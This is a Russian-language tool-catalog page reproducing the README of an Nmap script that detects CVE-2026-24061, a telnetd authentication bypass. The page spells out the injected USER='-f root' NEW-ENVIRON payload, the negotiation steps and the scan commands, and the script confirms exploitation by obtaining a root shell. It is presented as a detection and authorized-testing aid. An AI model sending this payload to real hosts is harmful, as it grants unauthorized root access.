Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-24061-NSE — Скрипт выполняет полное зеркалирование Telnet-переговоров, повторяя точную байтовую последовательность реального клиентского сеанса telnet -a. | Kitploit
Инструменты/GitHubGitHub/hd0x01/cve-2026-24061-nse
Сканеры уязвимостейЭксплуатацияСетевая безопасностьТестирование на ПроникновениеАутентификация
GitHubhd0x01/cve-2026-24061-nse

CVE-2026-24061-NSE

Скрипт выполняет полное зеркалирование Telnet-переговоров, повторяя точную байтовую последовательность реального клиентского сеанса telnet -a.

Репозиторий
5 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-24061 — Обход аутентификации в GNU InetUtils telnetd

Nmap NSE-скрипт обнаружения

Nmap NSE CVE CVSSv3 License


Обзор

Этот Nmap NSE-скрипт обнаруживает CVE-2026-24061 — уязвимость обхода аутентификации в GNU InetUtils telnetd версий 1.9.3–2.7.

Отправляя специально сформированную переменную окружения USER вида -f <username> во время согласования опций Telnet, неаутентифицированный злоумышленник может получить оболочку с правами указанного локального пользователя — включая — .

root
без ввода какого-либо пароля

Предполагаемое использование: Только авторизованное тестирование на проникновение и оценка уязвимостей.
Запуск этого скрипта против систем без явного письменного разрешения является незаконным.


Сведения об уязвимости

ПолеЗначение
CVE IDCVE-2026-24061
Затронутые версииGNU InetUtils telnetd 1.9.3 – 2.7
Оценка CVSSv39.8 Critical
ВекторCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
ТипОбход аутентификации (CWE-287)
Раскрытие2026-01-01

Как это работает

GNU InetUtils telnetd использует опцию Telnet NEW-ENVIRON (RFC 1572) для получения переменных окружения от клиента на этапе согласования. Затем программа login(1) вызывается с этими переменными.

Уязвимость возникает из-за того, что telnetd передаёт переменную USER напрямую в login без её очистки. Программа login в Linux принимает флаг -f <user>, означающий «предварительно аутентифицирован, пароль не проверять». Внедряя USER="-f root" через полезную нагрузку NEW-ENVIRON, злоумышленник полностью обходит аутентификацию.

root@kitploit:~
Client → Server:  IAC SB NEW-ENVIRON IS  VAR "USER"  VALUE "-f root"  IAC SE
Server response:  spawns login -f root  →  root shell, no password required

Сведения о скрипте

ПолеЗначение
Имя файлаtelnet-vuln-cve-2026-24061.nse
Категорииvuln, exploit, intrusive
ПортTCP/23 (telnet)
Протестировано наNmap 7.94 / 7.98, Windows и Linux

Метод обнаружения

Скрипт выполняет полное согласование Telnet, повторяя точную байтовую последовательность реального клиентского сеанса telnet -a (восстановленную из захвата Wireshark):

  1. Получение начальной серии IAC от сервера (DO TTYPE, DO TSPEED, DO ENVIRON, …)
  2. Ответ с полным объявлением возможностей клиента (WILL TTYPE, WILL LINEMODE, …)
  3. Завершение цикла субсогласования (SB TSPEED, SB ENVIRON, SB TTYPE)
  4. Внедрение специально сформированной USER='-f <user>' в полезную нагрузку NEW-ENVIRON IS
  5. Завершение последовательности WILL ECHO / DO BINARY / WONT LINEMODE
    (критически важно — без этого telnetd не может завершить настройку PTY)
  6. Проверка, отправляет ли сервер приглашение оболочки входа без запроса пароля

Состояния результата:

СостояниеЗначение
EXPLOITПолучено приглашение оболочки — обход подтверждён
LIKELY_VULNПолезная нагрузка ENV принята, запроса пароля нет, но приглашения оболочки нет
NOT_VULNЗапрос пароля присутствует, или согласование не завершилось

Установка

Linux

root@kitploit:~
# Copy to Nmap scripts directory
sudo cp telnet-vuln-cve-2026-24061.nse /usr/share/nmap/scripts/

# Update script database
sudo nmap --script-updatedb

Windows

root@kitploit:~
# Copy to Nmap scripts directory (adjust path if needed)
copy telnet-vuln-cve-2026-24061.nse "C:\Program Files (x86)\Nmap\scripts\"

# Update script database (run as Administrator)
nmap --script-updatedb

Использование

Базовое сканирование (пользователь по умолчанию: root)

root@kitploit:~
nmap -p 23 --script telnet-vuln-cve-2026-24061 <target>

Указание другого пользователя

root@kitploit:~
# Short form
nmap -p 23 --script telnet-vuln-cve-2026-24061 --script-args user=kali <target>

# Medium form
nmap -p 23 --script telnet-vuln-cve-2026-24061 --script-args telnet-user=kali <target>

# Fully qualified
nmap -p 23 --script telnet-vuln-cve-2026-24061 \
    --script-args telnet-vuln-cve-2026-24061.user=kali <target>

Сканирование диапазона IP-адресов

root@kitploit:~
nmap -p 23 --script telnet-vuln-cve-2026-24061 192.168.1.0/24

Подробный / отладочный вывод

root@kitploit:~
nmap -p 23 --script telnet-vuln-cve-2026-24061 -v  <target>   # verbose
nmap -p 23 --script telnet-vuln-cve-2026-24061 -d  <target>   # debug
nmap -p 23 --script telnet-vuln-cve-2026-24061 -d2 <target>   # full hex trace

Пример вывода

Уязвимый хост

root@kitploit:~
PORT   STATE SERVICE
23/tcp open  telnet
| telnet-vuln-cve-2026-24061:
|   VULNERABLE:
|   GNU InetUtils telnetd Authentication Bypass
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2026-24061
|     Risk factor: Critical  CVSSv3: 9.8
|     Description:
|       The telnetd service in GNU InetUtils (1.9.3 - 2.7) allows
|       authentication bypass via a crafted USER environment variable.
|       Sending '-f <user>' results in an unauthenticated login shell.
|     Extra information:
|       Authentication bypassed: shell prompt received after injecting
|       USER='-f root' -- no password challenge was presented.
|     References:
|       https://nvd.nist.gov/vuln/detail/CVE-2026-24061
|       https://github.com/JayGLXR/CVE-2026-24061-POC
|_      https://github.com/SafeBreach-Labs/CVE-2026-24061

Неуязвимый хост

root@kitploit:~
PORT   STATE SERVICE
23/tcp open  telnet

(нет вывода скрипта — NOT_VULN по умолчанию молчалив, стандартное соглашение Nmap)


Аргументы скрипта

АргументПсевдоним(ы)По умолчаниюОписание
telnet-vuln-cve-2026-24061.usertelnet-user, userrootИмя пользователя для внедрения через -f

Технические примечания

Почему WONT LINEMODE критически важен

GNU InetUtils telnetd использует согласование Linemode (RFC 1184) для определения режима терминального ввода-вывода. Сервер отправляет DO LINEMODE в начале согласования, и клиент изначально отвечает WILL LINEMODE. После обмена полезной нагрузкой ENV сервер отправляет WILL ECHO, за которым следует DO BINARY. На этом этапе клиент должен ответить WONT LINEMODE, чтобы сигнализировать о посимвольном режиме — только тогда telnetd сможет завершить настройку PTY (ioctl TIOCSWINSZ) и запустить login. Без этого шага сервер регистрирует peer died: Inappropriate ioctl for device и разрывает соединение.

NSE Socket API

API сокетов NSE в Nmap отличается от стандартных соглашений Lua-сокетов:

root@kitploit:~
-- Nmap NSE (correct):
local status, data = sock:receive_bytes(1)
if status == true then -- data is the received string

Ссылки

  • NVD — CVE-2026-24061
  • PoC от JayGLXR
  • PoC от SafeBreach-Labs
  • RFC 1572 — NEW-ENVIRON
  • RFC 1184 — Linemode
  • Документация Nmap NSE

Отказ от ответственности

Этот скрипт предоставляется только для авторизованного тестирования безопасности и исследовательских целей. Автор не несёт ответственности за любое неправомерное использование или ущерб, причинённый этим инструментом. Всегда получайте явное письменное разрешение перед тестированием систем, которые вам не принадлежат.

Скачать инструмент